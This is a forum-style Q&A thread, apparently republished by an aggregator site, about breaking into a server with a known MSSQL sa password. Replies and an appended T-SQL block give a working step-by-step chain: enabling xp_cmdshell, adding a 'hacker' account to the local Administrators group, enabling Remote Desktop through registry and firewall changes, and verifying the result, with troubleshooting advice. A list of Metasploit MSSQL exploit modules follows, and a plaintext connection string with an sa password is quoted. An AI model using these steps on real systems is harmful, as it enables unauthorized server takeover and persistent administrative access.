How to break into a server using MSSQL

Editor's note: this article was compiled by the editors of 小常识网 (cha138.com) and covers how to break into a server using MSSQL; we hope it is of some reference value to you.

I currently have sa privileges on an MSSQL server, and I have the password.

I can connect to it.

How do I use this to break directly into the server, or into the website?

Could an expert please advise?

52.78.x.x

connServerName = "LZWEB"
connDatabase = "articleSQL"
connUserName = "sa"
connPassword = "1865windowsserver"
It doesn't work.
The password is wrong.

1. Try whether a tool such as 啊D can add an administrator account directly.
2. Use a SQL client to connect to 52.78.x.x with the username and password you gave, then run the following SQL commands:
   exec master.dbo.xp_cmdshell 'net user hacker hacker /add'
   exec master.dbo.xp_cmdshell 'net localgroup administrators hacker /add'
   This adds the user hacker to the administrators group.
Reference answer A: connPassword = "1865windowsserver"

Reference answer B: connUserName = "sa"
Username = sa
connPassword = "1865windowsserver"
Password = "1865windowsserver"

Learn some English, bro. You have sa privileges sitting right in front of you and don't know how to use them.
sa privileges mean system privileges: run cmd, add an account, enable 3389,
and log in.
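
The chain the answers above sketch (get a command shell through xp_cmdshell, add a local account, put it in Administrators, enable 3389) written out as T-SQL, with the checks a practitioner runs before and after each step. This is an added example, not code from the thread. It assumes a working sa login on SQL Server 2005 or later running on Windows Server 2008 or later, and reuses the thread's placeholder account name and password; the registry key and netsh rule group are the standard Windows ones for Remote Desktop.

```sql
-- Added example, not from the original thread. Assumes a working sa login
-- (sysadmin) on SQL Server 2005+ and a Windows Server 2008+ host.

-- 1. xp_cmdshell is disabled by default since SQL Server 2005: check first.
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');

-- 2. Enable it. Both sp_configure calls need sysadmin, which sa has.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

-- 3. xp_cmdshell runs as the SQL Server *service* account, not as sa.
--    If that account is not a local administrator (e.g. the default
--    NT Service\MSSQLSERVER virtual account), the steps below fail with
--    "System error 5 has occurred", so find out before going further.
EXEC master.dbo.xp_cmdshell 'whoami';
EXEC master.dbo.xp_cmdshell 'whoami /groups | findstr /i administrators';

-- 4. The steps from the answers: add an account (placeholder name and
--    password taken from the thread) and put it in Administrators.
EXEC master.dbo.xp_cmdshell 'net user hacker hacker /add';
EXEC master.dbo.xp_cmdshell 'net localgroup administrators hacker /add';

-- 5. Enable Remote Desktop (3389) and let it through the Windows firewall.
EXEC master.dbo.xp_cmdshell 'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f';
EXEC master.dbo.xp_cmdshell 'netsh advfirewall firewall set rule group="remote desktop" new enable=Yes';

-- 6. Verify: the new account is in the group and 3389 is listening.
EXEC master.dbo.xp_cmdshell 'net localgroup administrators';
EXEC master.dbo.xp_cmdshell 'netstat -an | findstr :3389';
```

The `whoami` lines in step 3 are the check worth running before anything else: the answers treat sa as "system privileges", but xp_cmdshell only gives you whatever the SQL Server service account has, and a locked-down service account means `net user /add` and `reg add` both fail with error 5. Two further failure modes: if the host enforces password complexity, `net user hacker hacker /add` is rejected with "The password does not meet the password policy requirements", and on Windows Server 2003 the `netsh advfirewall` syntax does not exist (the older `netsh firewall` syntax applies there).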

MSSQL scanning and exploitation modules in msf

Name                                                        Disclosure Date  Rank       Description
auxiliary/admin/mssql/mssql_enum                                             normal     Microsoft SQL Server Configuration Enumerator
auxiliary/admin/mssql/mssql_enum_domain_accounts                             normal     Microsoft SQL Server SUSER_SNAME Windows Domain Account Enumeration
auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli                        normal     Microsoft SQL Server SQLi SUSER_SNAME Windows Domain Account Enumeration
auxiliary/admin/mssql/mssql_enum_sql_logins                                  normal     Microsoft SQL Server SUSER_SNAME SQL Logins Enumeration
auxiliary/admin/mssql/mssql_escalate_dbowner                                 normal     Microsoft SQL Server Escalate Db_Owner
auxiliary/admin/mssql/mssql_escalate_dbowner_sqli                            normal     Microsoft SQL Server SQLi Escalate Db_Owner
auxiliary/admin/mssql/mssql_escalate_execute_as                              normal     Microsoft SQL Server Escalate EXECUTE AS
auxiliary/admin/mssql/mssql_escalate_execute_as_sqli                         normal     Microsoft SQL Server SQLi Escalate Execute AS
auxiliary/admin/mssql/mssql_exec                                             normal     Microsoft SQL Server xp_cmdshell Command Execution
auxiliary/admin/mssql/mssql_findandsampledata                                normal     Microsoft SQL Server Find and Sample Data
auxiliary/admin/mssql/mssql_idf                                              normal     Microsoft SQL Server Interesting Data Finder
auxiliary/admin/mssql/mssql_ntlm_stealer                                     normal     Microsoft SQL Server NTLM Stealer
auxiliary/admin/mssql/mssql_ntlm_stealer_sqli                                normal     Microsoft SQL Server SQLi NTLM Stealer
auxiliary/admin/mssql/mssql_sql                                              normal     Microsoft SQL Server Generic Query
auxiliary/admin/mssql/mssql_sql_file                                         normal     Microsoft SQL Server Generic Query from File
auxiliary/analyze/jtr_mssql_fast                                             normal     John the Ripper MS SQL Password Cracker (Fast Mode)
auxiliary/gather/lansweeper_collector                                        normal     Lansweeper Credential Collector
auxiliary/scanner/mssql/mssql_hashdump                                       normal     MSSQL Password Hashdump
auxiliary/scanner/mssql/mssql_login                                          normal     MSSQL Login Utility
auxiliary/scanner/mssql/mssql_ping                                           normal     MSSQL Ping Utility
auxiliary/scanner/mssql/mssql_schemadump                                     normal     MSSQL Schema Dump
auxiliary/server/capture/mssql                                               normal     Authentication Capture: MSSQL
exploit/windows/iis/msadc                                                    excellent  MS99-025 Microsoft IIS MDAC msadcs.dll RDS Arbitrary Remote Command Execution
exploit/windows/mssql/lyris_listmanager_weak_pass           2005-12-08       excellent  Lyris ListManager MSDE Weak sa Password
exploit/windows/mssql/ms02_039_slammer                      2002-07-24       good       MS02-039 Microsoft SQL Server Resolution Overflow
exploit/windows/mssql/ms02_056_hello                        2002-08-05       good       MS02-056 Microsoft SQL Server Hello Overflow
exploit/windows/mssql/ms09_004_sp_replwritetovarbin         2008-12-09       good       MS09-004 Microsoft SQL Server sp_replwritetovarbin Memory Corruption
exploit/windows/mssql/ms09_004_sp_replwritetovarbin_sqli    2008-12-09       excellent  MS09-004 Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection
exploit/windows/mssql/mssql_clr_payload                     1999-01-01       excellent  Microsoft SQL Server Clr Stored Procedure Payload Execution
exploit/windows/mssql/mssql_linkcrawler                     2000-01-01       great      Microsoft SQL Server Database Link Crawling Command Execution
exploit/windows/mssql/mssql_payload                         2000-05-30       excellent  Microsoft SQL Server Payload Execution
exploit/windows/mssql/mssql_payload_sqli                    2000-05-30       excellent  Microsoft SQL Server Payload Execution via SQL Injection
post/windows/gather/credentials/mssql_local_hashdump                         normal     Windows Gather Local SQL Server Hash Dump
post/windows/manage/mssql_local_auth_bypass                                  normal     Windows Manage Local Microsoft SQL Server Authorization Bypass
